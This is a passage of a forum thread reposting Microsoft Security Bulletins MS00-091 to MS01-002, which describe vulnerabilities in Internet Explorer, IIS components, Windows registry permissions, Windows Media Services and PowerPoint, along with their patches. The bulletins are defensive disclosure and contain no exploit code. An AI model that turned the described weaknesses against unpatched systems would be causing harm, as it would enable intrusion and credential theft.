- Microsoft Knowledge Base article Q280419 discusses this issue
and will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp.
Acknowledgments
===============
Microsoft thanks the following people:
- AtStake (http://www.atstake.com) for reporting the ".ASX
Buffer Overrun" issue to us and working with us to protect
customers.
- GFI (http://gfi.com) for reporting the ".WMS Script Execution"
vulnerability to us and working with us to protect customers.
Revisions
=========
- November 22, 2000: Bulletin Created.
socalgal
11-30-2000, 09:41 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Resending due to a bad signature on a previous mailer.
We are in the process of changing our bulletin mailing format for
better customer satisfaction. If you have any feedback please send
mailto:secfdbck@microsoft.com.
================================================== ===============
Issue: Vulnerability of NBT service on Microsoft Windows NT
4.0, Windows 9x and Windows Me.
Date: 30 November 2000
Affected Software: Windows NT 4.0, Windows 9x and Me.
Impact: Denial of Service
Bulletin ID: MS00-091
Bulletin: http://www.microsoft.com/technet/security/bulletin/ms00-091.asp
Acknowledgment: BindView Razor Team (http://razor.bindview.com)
socalgal
12-01-2000, 07:17 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
- -----------------------------------------------------------------
Issue: Print template feature could allow web site to run code on visiting user's machine; web form could be used to read user's files.
Acknowledgment: Juan Carlos Garcia Cuartango (www.s21sec.com)
Vladimir Sulc, jr. (www.microrisc.cz)
Warren Greer
******************
Microsoft Security Bulletin (MS00-093)
Patch Available for "Browser Print Template" and "File Upload via Form" Vulnerabilities
Originally posted: December 01, 2000
Summary
Microsoft has released a patch that eliminates four security vulnerabilities in Microsoft® Internet Explorer:
The “Browser Print Template” vulnerability, which could enable a malicious web site operator to take unauthorized actions on the computer of a user who visited her site.
The “File Upload via Form” vulnerability, which could enable a malicious web site operator to read files on a visiting user’s computer.
New variants of the “Scriptlet Rendering” and “Frame Domain Verification” vulnerabilities, both of which could enable a malicious web site operator to read files on a visiting user’s computer.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-093.asp
Issue
The three security vulnerabilities eliminated by this patch are unrelated to each other except by the fact that they all occur in the same .dll. We have packaged the fix for all three issues together in one updated .dll together for customer convenience.
The vulnerabilities are:
The “Browser Print Template” vulnerability, which affects IE 5.5 only. IE 5.5 introduces a new feature known as Print Templates, which provides the ability to customize how browser pages will look when they’re previewed and printed. A vulnerability exists in the feature that would enable a web application to invoke a custom print template without garnering approval from the user. This poses a security hazard because Print templates are, by design, trusted code and therefore able to execute ActiveX controls, even ones that are not marked as safe for scripting.
The “File Upload via Form” vulnerability, which affects IE versions 5.0 through 5.5. The INPUT TYPE element supports a variety of methods of providing input via HTML forms, one of which allows the user to specify the name of a file to upload to the site. Subject to a number of constraints, it could be possible for a web application to fill in this field with the name of a desired file and then submit the form.
A new variant of the “Scriptlet Rendering” vulnerability, which affects IE version 5.0 through 5.5. The original variant, discussed in Microsoft Security Bulletin MS00-055, involved the ability to render non-HTML file types. This could enable a malicious web site operator to provide bogus information consisting of script, solely for the purpose of introducing it into an IE system file with a known name, then render the file to execute the script. The net effect would be to make the script run in the Local Computer Zone, at which point it could access files on the user's local file system. The new variant operates in exactly the same way, but uses a different mechanism to render the file.
A new variant of the “Frame Domain Verification” vulnerability, which affects IE versions 5.5 through 5.0. As discussed in Microsoft Security Bulletin MS00-033 and MS00-055, several functions do not enforce proper separation of frames in the same window that reside in different domains. The new variant involves an additional function with the same flaw. The net effect of the vulnerability would be to enable a malicious web site operator to open two frames, one in his domain and another on the user’s local file system, and enable the latter to pass information to the former. This patch eliminates all known variants of this vulnerability.
Note: The patch requires IE 5.5 SP1 or IE 5.01 SP1 to install. Customers who install this patch on other versions may receive a message reading "This update does not need to be installed on this system". This message is incorrect. More information is available in KB article Q279328.
Note: Although one of the vulnerabilities discussed here only affects IE 5.5, the patch above is suitable for installation on either IE 5.5 SP1 or IE 5.01 SP1. The patch will detect the version of IE and only install the needed components.
Note: Per the normal security support policy for IE, security patches for Internet Explorer version 4.x are no longer being produced. Microsoft recommends that IE 4.x customers who are concerned about this issue consider upgrading to either IE 5.5 or IE 5.01 SP1.
Note: The fix for this issue will be included in IE 5.5 SP1 and IE 5.01 SP2.
Note Additional security patches are available at the Microsoft Download Center
More Information
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS00-093, http://www.microsoft.com/technet/security/bulletin/fq00-093.asp
Microsoft Knowledge Base article Q279328 discusses the “Browser Print Template” and will be available soon.
Microsoft Knowledge Base article Q279329 discusses the “File Upload via Form” vulnerability and will be available soon.
Microsoft Knowledge Base article Q279881 discusses the new variant of the “Scriptlet Rendering” vulnerability and will be available soon.
Microsoft Knowledge Base article Q279330 discusses the new variant of the “Frame Domain Verification” vulnerability and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp.
Acknowledgments
Microsoft thanks the following people for working with us to protect customers:
Warren R. Greer for reporting the “Browser Print Template” issue to us.
Juan Carlos Garcia Cuartango (www.s21sec.com) and Vladimir Sulc, jr., (www.microrisc.cz) for reporting the “File Upload via Form” vulnerability to us.
Revisions
December 01, 2000: Bulletin Created.
[This message has been edited by socalgal (edited 12-04-2000).]
socalgal
12-04-2000, 07:04 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
- --------------------------------------------------------------------
Issue: Buffer Overflow in Phone Book Service
Microsoft Security Bulletin (MS00-094)
Patch Available for "Phone Book Service Buffer Overflow" Vulnerability
Originally posted: December 04, 2000
Summary
Microsoft has released a patch that eliminates a security vulnerability in an optional service that ships with Microsoft® Windows NT® 4.0 and Windows® 2000 Servers. The vulnerability could allow a malicious user to execute hostile code on a remote server that is running the service.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-094.asp
Issue
The Phone Book Service is an optional component that ships with the NT 4 Option Pack and Windows 2000. This Service is used in conjunction with Dial Up Networking clients to provide computers with a pre-populated list of dial-up networking servers.
Due to an unchecked buffer in the Phone Book Service, a particular type of malformed URL could be used to execute arbitrary code on an IIS 4 or IIS 5 web server running the Phone Book Service. This would potentially enable a malicious user to gain privileges on the machine commensurate with those of the IUSR_machinename account (IIS 4) or the IWAM_machinename account (IIS 5). The IUSR account and the IWAM account are members of the Everyone group. In some instances, members of the Everyone group, including the accounts above, are able to execute operating system commands on the web server.
Although this vulnerability would not grant the malicious user administrative level privileges, it would give the malicious user the ability to add, change or delete specific data, run code already on the server, or upload new code to the server and run it.
Phone Book Services are not installed by default on IIS 4 and IIS 5 servers. Instead, this service must be specifically installed via the NT 4 Option Pack or Windows 2000 Optional Networking Components. Customers who have not installed this service would not be at risk from this vulnerability.
Affected Software Versions
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0 Server, Enterprise Edition
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
NOTE: The Phone Book Service can only be installed on IIS 4 or IIS 5 servers.
Patch Availability
Microsoft Windows NT 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26193
Microsoft Windows 2000: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25531
NOTE: The NT 4.0 fix can be applied to systems running NT 4.0 Service Pack 6a. This fix will be included in NT 4.0 Service Pack 7. The Windows 2000 fix can be applied to Windows 2000 Gold or Service Pack 1. This fix will be included in Windows 2000 Service Pack 2.
Note Additional security patches are available at the Microsoft Download Center
More Information
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS00-094, http://www.microsoft.com/technet/security/bulletin/fq00-094.asp
Microsoft Knowledge Base article Q276575 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
Microsoft thanks CORE-SDI (www.core-sdi.com) and @Stake (www.stake.com) for reporting this issue to us and working with us to protect customers.
Revisions
December 04, 2000: Bulletin Created.
socalgal
12-06-2000, 07:36 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
Acknowledgment: Chris Anley of @stake (http://www.atstake.com)
Milan Dadok
Glenn Larsson
=============================================
Microsoft Security Bulletin (MS00-095)
Tool Available for “Registry Permissions” Vulnerability
Originally posted: December 06, 2000
Summary:
Microsoft has released a tool that corrects the permissions on several registry values in Microsoft® Windows NT® 4.0. The default permissions could allow a malicious user to gain additional privileges on an affected machine.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-095.asp
Issue:
Three registry keys have default permissions that are inappropriately loose.
The keys, and the risk they pose, are as follows:
The “SNMP Parameters” key, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SNMP\Parameters, provides the SNMP community name and SNMP management station identifiers, if they exist. Reading this information would enable a malicious user to pose as a bona fide SNMP manager for any community the affected machine belonged to. (In actuality, though, the same information could be obtained by monitoring network traffic). Changing this information would enable her to create a community consisting solely of her local machine, as a way of gaining management privileges on it. SNMP is not installed on Windows NT 4.0 machines by default.
The “RAS Administration” key, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RAS, provides a way to install third-party RAS products that work with the Windows NT native RAS service. By changing one of the values in this key, it would be possible for a malicious user to specify code of her choice as a third-party management tool. The code would then run in the LocalSystem security context. Although it might be possible to make the needed registry changes remotely, the malicious user’s code would need to reside on the affected machine itself. RAS is not installed on Windows NT 4.0 machines by default.
The “MTS Package Administration” key, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Transaction Server\Packages, includes information about which users are allowed to install and change MTS packages. By adding herself as an MTS manager, a malicious user could gain the ability to add, delete or change MTS packages. Although it might be possible in some cases to make the needed registry changes remotely, the malicious user would still need the ability to log onto the affected machine interactively in order to exercise her new privileges. MTS is not installed on Windows NT 4.0 machines by default.
In addition to correcting the permissions on these keys, the tool also changes the permissions on several other keys that have previously been discussed. Specifically, the tool makes all the changes discussed in Microsoft Security Bulletins MS00-008 and MS00-024.
Affected Software Versions:
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0 Server, Enterprise Edition
Microsoft Windows NT 4.0 Server, Terminal Server Edition
Note: The version of the tool in this bulletin also includes all changes discussed in Security Bulletins MS00-008 and MS00-024.
Note: This tool may be run on machines running Windows NT 4.0 Service Packs 5 and 6a.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS00-095, http://www.microsoft.com/technet/security/bulletin/fq00-095.asp
Microsoft Security Bulletin MS00-008, http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Microsoft Security Bulletin MS00-024, http://www.microsoft.com/technet/security/bulletin/ms00-024.
Microsoft Knowledge Base article Q265714 discusses the "SNMP Parameters" vulnerability and will be available soon.
Microsoft Knowledge Base article Q267861 discusses the "RAS Administration" vulnerability and will be available soon.
Microsoft Knowledge Base article Q267864 discusses the "MTS Package Administration" vulnerability and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp.
Acknowledgments
Microsoft thanks the following people for working with us to protect customers:
Chris Anley of @stake for reporting the “SNMP Parameters” vulnerability.
Milan Dadok for reporting the "RAS Administration" vulnerability.
Glenn Larsson for reporting the “MTS Package Administrator” vulnerability.
Revisions
December 06, 2000: Bulletin Created.
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.
socalgal
12-06-2000, 07:41 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
================================================== ====================
Issue: Wrong permissions on SNMP registry key
Date: 06 December 2000
Affected Software: Windows 2000
Impact: Usurp management privileges on SNMP devices
Acknowledgment: Chris Anley of @stake (http://www.atstake.com)
=============================================
Microsoft Security Bulletin (MS00-096)
Tool Available for “SNMP Parameters” Vulnerability
Originally posted: December 06, 2000
Summary:
Microsoft has released a tool that corrects the permissions on several registry values in Microsoft® Windows® 2000. The default permissions could allow a malicious user to monitor or reconfigure certain devices on a network.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-096.asp
Issue:
This vulnerability is virtually identical to the “SNMP Parameters” vulnerability affecting Windows NT® 4.0 systems and discussed in Microsoft Security Bulletin MS00-095.
The registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SNMP\Parameters provides the SNMP community name and SNMP management station identifiers, if they exist. Reading this information would enable a malicious user to pose as a bona fide SNMP manager for any community her machine belonged to. Changing this information would enable her to create a community consisting solely of her local machine, as a way of gaining management privileges on it.
It should be noted that the information revealed by this vulnerability is normally transmitted in plaintext across SNMP-managed networks. As a result, even in the absence of incorrect registry permissions, a malicious user could carry out the same attack if she could monitor network communications. SNMP is not installed on Windows 2000 machines by default.
Affected Software Versions:
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Note: The Security Configuration and Analysis template provided in the patch can be applied to any Windows 2000 system.
Note: Additional security patches are available at the Microsoft Download Center.
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS00-096, http://www.microsoft.com/technet/security/bulletin/fq00-096.asp
Microsoft Security Bulletin MS00-095, Microsoft Security Bulletin http://www.microsoft.com/technet/security/bulletin/MS00-095.asp.
Microsoft Knowledge Base article Q266794 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp.
Acknowledgments:
Microsoft thanks Chris Anley of @stake (http://www.atstake.com) for reporting this issue to us and working with us to protect customers
Revisions:
December 06, 2000: Bulletin Created.
socalgal
12-15-2000, 10:09 PM
Microsoft Security Bulletin (MS00-097)
Patch Available for “Severed Windows Media Server Connection” Vulnerability
Originally posted: December 15, 2000
Summary:
Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Windows Media™ Services. The vulnerability could allow a malicious user to degrade the performance of a Windows Media server, possibly to the point where it could no longer provide useful service.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-097.asp
Issue:
When a connection to a Windows Media server is made, then severed, using a particular sequence of TCP/IP packets, the Windows Media Unicast Service does not release all of the resources allocated to the connection. By repeatedly making and then severing connections in this manner, a malicious user could exhaust the resources on a server, thereby preventing it from providing streaming media services.
If an affected server were attacked via this vulnerability, the server operator could restore normal operation by restarting the Windows Media Service. Any sessions that were in progress would be lost, but users could immediately reconnect and resume normal use.
Affected Software Versions:
Microsoft Windows Media Services 4.0
Microsoft Windows Media Services 4.1
Note: Windows Media Services 4.1 ships as part of Windows 2000, and the patch for Windows Media Services 4.1 can be applied atop Windows 2000 Gold or SP1. The fix will be incorporated into Windows 2000 SP3.
Note: Windows Media Services 4.0 does not ship as part of any other product. The patch for Windows Media Services 4.0 can be applied to any machine already running the product, and will not be included in any other product's future service packs.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS00-097, http://www.microsoft.com/technet/security/bulletin/fq00-097.asp
Microsoft Knowledge Base article Q281256 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks NTT Communications http://www.ntt.com for reporting this issue to us and working with us to protect customers.
Revisions:
December 15, 2000: Bulletin Created.
socalgal
12-19-2000, 06:00 PM
Microsoft Security Bulletin (MS00-098)
Patch Available for “Indexing Service File Enumeration” Vulnerability
Originally posted: December 19, 2000
Summary:
Microsoft has released a patch that eliminates a security vulnerability in a component that ships as part of Microsoft® Windows® 2000. The vulnerability could allow a malicious web site operator to learn the names and properties of files and folders on the machine of a visiting user.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-098.asp
Issue:
An ActiveX control that ships as part of Indexing Service is incorrectly marked as “safe for scripting”, thereby enabling it to be executed by web site applications. The control at issue here could be used to enumerate files and folders, and to view their properties. It would not be necessary for Indexing Service to be running in order for the vulnerability to be exploited; however, if it were running, the control also could be used to search for files containing specific words. The vulnerability could not be used to read files, except via a fairly unlikely scenario discussed in detail in the FAQ. It could not be used under any conditions to change, add or delete information on the user’s computer.
A patch has been provided for Indexing Service 3.0, but not for Index Server 2.0. This is primarily due to the different delivery vehicles for the two versions. Indexing Service 3.0 ships as part of all versions of Windows 2000; thus, the vulnerability could affect all Windows 2000 users. In contrast, Index Server 2.0 ships as part of the Windows NT 4.0 Option Pack; thus, to be affected by the vulnerability in Index Server 2.0, a webmaster would need to browse untrustworthy Internet sites from a web server, which is contrary to normal recommended practices.
Affected Software Versions:
Index Server 2.0
Indexing Service 3.0
Note: Index Server 2.0 ships as part of the Windows NT 4.0 Option Pack. Indexing Service 3.0 ships as part of all versions of Windows 2000.
Patch Availability:
Indexing Service 3.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26595
Note: As discussed in the FAQ, a patch has not been provided for Index Server 2.0, because this product should only be installed on web servers, which should never be used for browsing the Internet.
Note: This patch can be applied to systems running Windows 2000 Gold or Service Pack 1. It will be included in Windows 2000 Service Pack 3.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS00-098, http://www.microsoft.com/technet/security/bulletin/fq00-098.asp
Microsoft Knowledge Base article Q280838 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions:
December 19, 2000: Bulletin Created.
socalgal
12-20-2000, 05:54 PM
Microsoft Security Bulletin (MS00-099)
Patch Available for “Directory Service Restore Mode Password” Vulnerability
Originally posted: December 20, 2000
Summary:
Microsoft has released a patch that eliminates a security vulnerability affecting Microsoft® Windows® 2000 domain controllers. The vulnerability could allow a malicious user with physical access to a domain controller to install malicious software on it.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-099.asp
Issue:
Windows 2000 provides several special operating modes that can be chosen at boot time in order to allow the administrator to troubleshoot and restore a machine with a damaged configuration.
One of these, Directory Service Restore Mode, is designed to allow the Active Directory to be repaired and restored on a domain controller. A password is required in order to operate the system in this mode. However, if the “Configure Your Server” tool was used when the machine was originally promoted to domain controller, that password would be blank. This could enable a malicious user to log onto the machine in Directory Service Restore Mode. Once logged on, the malicious user could alter system components or install bogus ones that would execute when a bona fide administrator subsequently logged onto the machine.
There are three significant mitigating factors associated with this vulnerability:
+ The malicious user would need physical access to the machine in order to log into it in Directory Service Restore Mode. However, security best practices strongly recommend against ever giving unprivileged users physical access to critical servers like domain controllers. Customers who have followed this guidance would not be affected by the vulnerability.
+ The vulnerability only occurs if the “Configure Your Server” tool was used to promote the server to domain controller. If the DCPROMO tool was used, the machine could not be affected by the vulnerability.
+ The “Configure Your Server” tool can only be run on the first domain controller in a forest. As a result, no other servers could be affected by the vulnerability.
A second troubleshooting mode also is affected. When the Directory Service Restore Mode password is set, the password for the Recovery Console is automatically synchronized with it. As a result, machines affected by this vulnerability would have a blank password for both the Directory Service Restore Mode and the Recovery Console. However, the scope of the vulnerability is unchanged by the involvement of the Recovery Console, for better or worse.
Affected Software Versions:
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Note: Windows 2000 workstations are unaffected by this vulnerability.
Patch Availability:
The patch has been temporarily removed, but will be re-posted shortly.
Note: On Windows 2000 Server and Advanced Server systems, this patch can be installed atop either the Gold version or Service Pack 1. It will be included in Windows Server and Advanced Server, Service Pack 2.
Note Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS00-099, http://www.microsoft.com/technet/security/bulletin/fq00-099.asp
Microsoft Knowledge Base article Q271641 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks John Sherriff of the Wool Research Organization of New Zealand for reporting this issue to us and working with us to protect customers.
Revisions:
December 20, 2000: Bulletin Created.
[This message has been edited by socalgal (edited 12-20-2000).]
socalgal
12-22-2000, 08:06 PM
Microsoft Security Bulletin (MS00-100)
Patch Available for “Malformed Web Form Submission” Vulnerability
Originally posted: December 22, 2000
Summary:
Microsoft has released a patch that eliminates a security vulnerability in a component that ships as part of Microsoft® Internet Information Server. The vulnerability could potentially allow an attacker to prevent an affected web server from providing useful service.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-100.asp
Issue:
The FrontPage Server Extensions (FPSE) ship with and are installed by default as part of IIS 4.0 and 5.0. The most familiar FPSE functions allow web site and content management; however, FPSE also provides browse-time support functions.
Among the functions included in the latter category are ones that help process web forms that have been submitted by a user. A vulnerability exists in one of these functions. If a malicious user levied a specially-malformed form submission to an affected server, it would cause the IIS service to fail. The vulnerability does not provide the opportunity to misuse any of the FPSE administrative or content management functions.
To resume normal operation on an IIS 4.0 server, the operator would need to restart the service. In contrast, if an IIS 5.0 server were attacked via this vulnerability, the IIS service would, by default, automatically restart almost immediately. Although any web sessions that were in progress at the time of the attack would be lost, the server would be able to accept new connections as soon as the service was restarted. FPSE is installed by default as part of IIS 4.0 and 5.0, but, in keeping with best practices, Microsoft recommends that they be disabled if not needed.
Affected Software Versions:
Microsoft IIS 4.0
Microsoft IIS 5.0
Patch Availability:
Microsoft IIS 5.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26277
Microsoft IIS 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26704
Note: The IIS 5.0 patch can be applied atop system running either Windows 2000 Gold or Service Pack 1. It will be included in Windows 2000 Service Pack 2.
Note: The IIS 4.0 patch can be applied atop system running Windows NT 4.0 Service Pack 6a or 5. It will be included in Windows NT 4.0 Service Pack 7.
Note: IIS users who have removed the FPSE are not affected by this vulnerability and do not need to take further action.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS00-100, http://www.microsoft.com/technet/security/bulletin/fq00-100.asp
Microsoft Knowledge Base article Q280322 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks eEye Digital Security http://www.eEye.com for reporting this issue to us and working with us to protect customers.
Revisions:
December 22, 2000: Bulletin Created.
socalgal
01-11-2001, 06:56 PM
Microsoft Security Bulletin (MS01-001)
Patch Available for "Web Client NTLM Authentication" Vulnerability
Originally posted: January 11, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability in a component that ships with Microsoft® Office 2000, Windows 2000, and Windows Me. The vulnerability could, under certain circumstances, allow a malicious user to obtain cryptographically protected logon credentials from another user when requesting an Office document from a web server.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-001.asp
Issue:
The Web Extender Client (WEC) is a component that ships as part of Office 2000, Windows 2000, and Windows Me. WEC allows IE to view and publish files via web folders, similar to viewing and adding files in a directory through Windows Explorer.
Due to an implementation flaw, WEC does not respect the IE Security settings regarding when NTLM authentication will be performed – instead, WEC will perform NTLM authentication with any server that requests it. If a user established a session with a malicious user’s web site – either by browsing to the site or by opening an HTML mail that initiated a session with it – an application on the site could capture the user’s NTLM credentials. The malicious user could then use an offline brute force attack to derive the password or, with specialized tools, could submit a variant of these credentials in an attempt to access protected resources.
The vulnerability would only provide the malicious user with the cryptographically protected NTLM authentication credentials of another user. It would not, by itself, allow a malicious user to gain control of another user’s computer or to gain access to resources to which that user was authorized access. In order to leverage the NTLM credentials (or a subsequently cracked password), the malicious user would have to be able to remotely logon to the target system. However, best practices dictate that remote logon services be blocked at border devices, and if these practices were followed, they would prevent an attacker from using the credentials to logon to the target system.
Affected Software Versions:
Microsoft Office 2000
Microsoft Windows 2000
Microsoft Windows Me
Patch Availability:
Microsoft Office 2000 (All Platforms): http://officeupdate.microsoft.com/2000/downloaddetails/wecsec.htm
Microsoft Windows 2000 (Without Office 2000): http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26889
Microsoft Windows Me (Without Office 2000): http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26705
Note: Since the affected component ships with the above products independent of Office 2000, we have provided patches for affected systems that may not be running Office 2000. As discussed in the FAQ, the patch and vulnerability only affect machines running Internet Explorer 5.0 or later with Web Folders enabled.
Note: This patch will be included in Windows 2000 Service Pack 2.
Note: Additional security patches are available at the Microsoft Download Center.
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-001, http://www.microsoft.com/technet/security/bulletin/fq01-001.asp
Microsoft Knowledge Base article Q282132 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks David Litchfield of @stake for reporting this issue to us and working with us to protect customers.
Revisions:
January 11, 2001: Bulletin Created.
socalgal
01-25-2001, 10:01 PM
Microsoft Security Bulletin (MS01-002)
Patch Available for “PowerPoint File Parsing” Vulnerability
Originally posted: January 22, 2001
Revised: January 25, 2001
Summary:
On January 22, Microsoft released the original version of this bulletin, to advise customers of the availability of a patch that eliminates a security vulnerability in Microsoft® PowerPoint 2000. The vulnerability could allow a user to construct a PowerPoint file that, when opened, could potentially run code on the reader’s system.
However, the originally released patch did not include the entirety of the fixes related to this vulnerability. An updated patch has been made available that corrects the orginally reported vulnerability. Customers who downloaded and installed the original patch should download and install the updated patch. Instructions for determining the current version of the patch and for installing the updated patch are available via the Patch Availability URL below.
This bulletin has also been updated to more accurately reflect the conditions under which this vulnerability may be exploited.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-002.asp
Issue:
A parsing routine that is executed when PowerPoint 2000 opens files contains an unchecked buffer. If an attacker inserted specially chosen data into a PowerPoint file and could entice another user into opening the file on his machine, the data would overrun the buffer, causing either of two effects. In the less serious case, overrunning the data would cause PowerPoint to fail, but wouldn’t have any other effect.
In the more serious case, overrunning the buffer could allow the attacker to cause code of her choice to run on the user’s machine. The code could take any action that the user himself could take on the machine. Typically, this would enable the attacker’s code to add, change or delete data, communicate with a remote server, or take other actions.
In order for this behavior to occur, a malicious user would need to entice a user into either opening the malformed PowerPoint 2000 file, visiting a malicious website, or viewing a specially crafted html email message.
Affected Software Versions:
Microsoft PowerPoint 2000
Patch Availability
Microsoft PowerPoint 2000: http://officeupdate.microsoft.com/2000/downloaddetails/ppt2ksec.htm
Note: This hotfix requires either Office 2000 SR-1 or SR-1a. This hotfix will be included in Office 2000 SR-1 Service Pack 3.
Note: Additional security patches are available at the Microsoft Download Center.
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-002, http://www.microsoft.com/technet/security/bulletin/fq01-002.asp
Microsoft Knowledge Base (KB) article Q285978 , http://www.microsoft.com/technet/support/kb.asp?ID=285978
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
